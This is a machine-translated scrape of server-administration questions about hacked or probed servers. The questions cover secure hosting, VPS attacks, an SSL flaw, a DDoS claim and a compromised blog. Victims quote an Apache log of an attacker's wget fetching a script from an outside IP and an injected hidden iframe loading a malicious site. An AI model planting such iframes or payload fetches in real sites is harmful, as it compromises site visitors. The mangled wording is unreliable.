服务器 Gind.cn

Articles of 黑客入侵

我在哪里find高安全性的专用服务器?

我目前正在开发一个需要保护敏感数据的项目。 我使用亚马逊和gigenet服务器,但我不知道他们是最安全的select。 服务器必须是.net应用程序服务器和SQL Server。 顺便说一句,安全我的意思是防止黑客。 有什么build议么? 更新:如果没有专门从事这种安全的数据中心,你知道有哪个安全公司可以帮助我吗?

如何防止对VPS的黑客攻击

自从我购买VPS以来,自从第一天起,我就一直收到如下所示的电子邮件。 我想知道这是否很正常? 有反正我可以预防它,或者CSF / LFD几乎是我最好的防御已经?

为什么在特定的服务器上有这么多的攻击?

我有几台networking服务器正在运行,其中一台在过去6个月里已经接收了6000次访问。 另一个几乎没有。 这是巧合还是我能做些什么来吸引黑客呢? 编辑:当我旋转新的服务器,有些似乎马上得到黑客的关注。 这很可能是因为IP地址被从以前的服务器重新使用,这是由于某种原因对黑客有吸引力的服务器。

你如何防御BlackHat 2009空字符SSL漏洞?

细节在这里: http : //hackaday.com/2009/07/29/black-hat-2009-breaking-ssl-with-null-characters/ 每个职位的一个build议请。

服务器被黑了。 需要帮助寻找如何

我们运行PHP / Apache的一个CentOS盒子最近被黑了。 幸运的是,我们很快就要退出这台服务器,并进行备份等。但是,我需要一些帮助来find黑客能够进入。 从我所搜集的内容看,有些脚本是在apache error_logs中使用apache(也许是PUT?)写入到我们的服务器上的: [Fri Sep 10 12:46:43 2010] [error] [client xx.xx.xx.xx] File does not exist: xyz.php –2010-09-10 12:46:45– http://208.75.xx.xx/newmax/max.txt Connecting to 208.75.xx.xx:80… connected. HTTP request sent, awaiting response… 200 OK Length: 28975 (28K) [text/plain] Saving to: `max.txt' 0K ………. ………. …….. 100% 184K=0.2s 2010-09-10 12:46:45 (184 KB/s) – `max.txt' saved [28975/28975] % […]

XerXes的真实? 如果是的话,有人知道它是如何工作的?

一个名为XerXes的黑客声称他创build了一个名为XerXes的应用程序,它可以在不使用botnets , zombie pc's情况下执行DDoS攻击,对中间节点没有附带损害,也不会对目标造成长期损害。 查看video中logging的实时DDoS攻击: >>这里<< 这个video让我担心(因为互联网可能不会保存),另一方面,我认为这是假的,因为如何能够以10千兆/秒的速度发起DDoS攻击(Th3j35ter声称他是对wikileaks网站的攻击负责)从一台电脑? 而维基解密是在3个不同的IP使用负载均衡器? 有谁知道这是真的吗? 如果是真的,它是如何工作的? 而网站如何能够保护自己呢? (我不是黑客/黑客/ scriptkiddie,我不想成为!!)

如何防止攻击者在我的服务器上search文件

我在日志文件中有很多错误,如: [Tue Jul 19 09:56:45 2011] [error] [client 61.160.222.90] File does not exist: /var/www/vhosts/xxx.com/httpdocs/xqxsmirserver6.rar [Tue Jul 19 09:56:45 2011] [error] [client 61.160.222.90] File does not exist: /var/www/vhosts/xxx.com/httpdocs/mirserver6.rar [Tue Jul 19 09:56:46 2011] [error] [client 61.160.222.90] File does not exist: /var/www/vhosts/xxx.com/httpdocs/mirserver6.rar [Tue Jul 19 09:56:46 2011] [error] [client 61.160.222.90] File does not exist: /var/www/vhosts/xxx.com/httpdocs/vqkbmirserver7.rar [Tue Jul […]

(GET / assets /)!== t &&(e.html(e.data(HTTP / 1.1“200 3538” – “”Java / 1.7.0_25“

我看到GET请求,如: "GET /assets/)!==t&&(e.html(e.data( HTTP/1.1" 200 3538 "-" "Java/1.7.0_25" 在我的日志中托pipe一个Rails应用程序的框。 看起来像是有人在探索应用程序,但不能确定。 有什么build议么?

我的服务器被黑客入侵了吗?

可能重复: 我的服务器被黑了应急 我有这个奇怪的页面,我很确定这不是我创build的: <iframe src="http://a.bad.site:8080/ts/in.cgi?pepsi106" width=125 height=125 style="visibility: hidden"></iframe> 它来自哪里? 这是一个病毒吗? 我的博客网站blog.domain.com在几个星期前还好。 但是现在突然间,当我去看我的博客时,它变成了空白页面并显示: This is index.html 任何人有任何想法如何永久删除它,并防止它再次发生在我的网站?

在目录浏览被禁用的情况下,IIS匿名托pipe文件的安全性如何?

为了详细阐述这一点,我想知道在IIS网站上托pipe文档的安全性如下: IIS目录列表已禁用 匿名访问已启用 网站只能通过HTTP访问 文件有很长的随机生成的名字(类似于guid加上其他字符) 我相信这是一个相对安全的设置(我理解它不像真正的authentication访问一样安全)。我想知道,如果我看到这个大墙,那么比我自己更多的知识的人很容易绕过。 我想我正在寻找的方式可以绕过我上面概述的设置。
Intereting Posts
DKIMPROXY签名错误的域名 如何计算IP范围和子网? Windows 2000 Server自动重新启动脚本 .htaccess被反复黑客攻击 来自一台Windows服务器的多个VPN连接 翻译回执和邮寄主pipe邮件 有没有办法取消(或暂停或推迟)磁盘pipe理(Win2k3)中的镜像/ RAID Resynch 安装MySQL时出错:无法更新安全设置 CentOS Apache虚拟主机 使用2 ZyXEL GS1920-48HP的VLAN“中继” 简单的Windows + Linux服务器configuration? 厨师/木偶/ Ansible等 在已经安装了64位Office 2010的terminal服务器上安装32位Access 2007? 路由新的出站stream量 ssl“工程”与www和没有子域,但不正确 CentOS 7下载并安装php7.0-cli离线